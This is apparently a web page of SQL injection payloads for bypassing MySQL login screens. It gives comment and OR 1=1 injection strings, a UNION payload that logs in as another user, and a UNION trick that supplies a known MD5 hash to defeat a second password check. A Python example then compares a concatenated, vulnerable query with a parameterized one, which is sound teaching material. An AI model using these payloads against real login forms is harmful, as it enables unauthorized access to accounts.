Hacking - SQL Injection - MySQL - Bypassing Login Screens

SQL Injection 101, Login tricks:

admin' --
admin' #
admin'/*
' OR 1=1--
' or 1=1#
' OR 1=1/*
') or '1'='1--
') or ('1'='1--
....

Login as different user

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

NOTE: Old versions of MySQL do not support union queries.


Bypassing second MD5 hash check login screens

If the application first fetches the record by username and then compares the returned MD5 with the MD5 of the supplied password, you need some extra tricks to fool the application into bypassing authentication.

You can union the results with a known password and the MD5 hash of that supplied password.

In this case, the application will compare your password with your supplied MD5 hash instead of the MD5 from the database.

Username : admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
Password : 1234

NOTE: 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
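
The fetch-by-username-then-compare-MD5 flow described above, shown next to the same flow with a bound parameter. This is an added example, not code from the original page. Assumptions: SQLite stands in for MySQL so it runs offline, and the table layout, function names and the admin password are constructed for illustration.

```python
import hashlib
import hmac
import sqlite3

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def make_db():
    # Constructed sample data; SQLite stands in for MySQL so this runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_md5 TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", md5_hex("constructed-admin-password")))
    return db

def login_concat(db, username, password):
    # Vulnerable flow from the text: user input is spliced into the SQL string,
    # so the row that comes back may not come from the users table at all.
    sql = ("SELECT username, password_md5 FROM users "
           "WHERE username = '" + username + "'")
    row = db.execute(sql).fetchone()
    return row is not None and row[1] == md5_hex(password)

def login_bound(db, username, password):
    # Hardened flow: the username travels as a bound parameter and is only
    # ever compared as data, so the returned hash is always the stored one.
    row = db.execute(
        "SELECT username, password_md5 FROM users WHERE username = ?",
        (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[1], md5_hex(password))

# The page's username input, followed by the "--" terminator from the page's
# first list so the quote the application appends is commented out.
PAGE_USERNAME = ("admin' AND 1=0 UNION ALL SELECT 'admin', "
                 "'81dc9bdb52d04dc20036dbd8313ed055'--")
PAGE_PASSWORD = "1234"

def compare_flows():
    db = make_db()
    return {
        "concat_accepts_page_input": login_concat(db, PAGE_USERNAME, PAGE_PASSWORD),
        "bound_accepts_page_input": login_bound(db, PAGE_USERNAME, PAGE_PASSWORD),
        "bound_accepts_real_login": login_bound(db, "admin", "constructed-admin-password"),
        "bound_rejects_wrong_password": not login_bound(db, "admin", PAGE_PASSWORD),
    }

if __name__ == "__main__":
    for name, value in compare_flows().items():
        print(name, value)
```

MD5 is kept in the bound version only to mirror the flow on this page; parameter binding removes the injection, not the weakness of an unsalted MD5 password hash.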